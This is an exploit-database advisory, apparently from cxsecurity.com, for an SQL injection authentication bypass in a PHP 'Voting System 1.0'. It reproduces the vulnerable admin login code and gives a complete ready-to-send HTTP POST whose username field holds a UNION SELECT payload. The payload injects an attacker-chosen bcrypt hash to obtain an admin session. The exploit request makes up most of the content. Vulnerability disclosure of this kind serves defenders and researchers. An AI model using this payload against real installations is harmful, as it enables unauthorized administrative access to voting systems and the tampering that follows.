Voting System 1.0 SQL Injection

2021.05.07
Credit: secure77
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) # Date: 06/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB You can simply bypass the /admin/login.php with the following sql injection. All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing ########################### Vulnerable code ############################ if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $sql = "SELECT * FROM admin WHERE username = '$username'"; $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find account with the username'; } else{ $row = $query->fetch_assoc(); echo "DB Password: " . $row['password']; echo "<br>"; echo "<br>"; echo "Input Password: " . $password; if(password_verify($password, $row['password'])){ echo "Equal"; $_SESSION['admin'] = $row['id']; } else{ echo "not Equal"; $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input admin credentials first'; } ########################### Payload ############################ POST /admin/login.php HTTP/1.1 Host: 192.168.1.1 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 167 login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top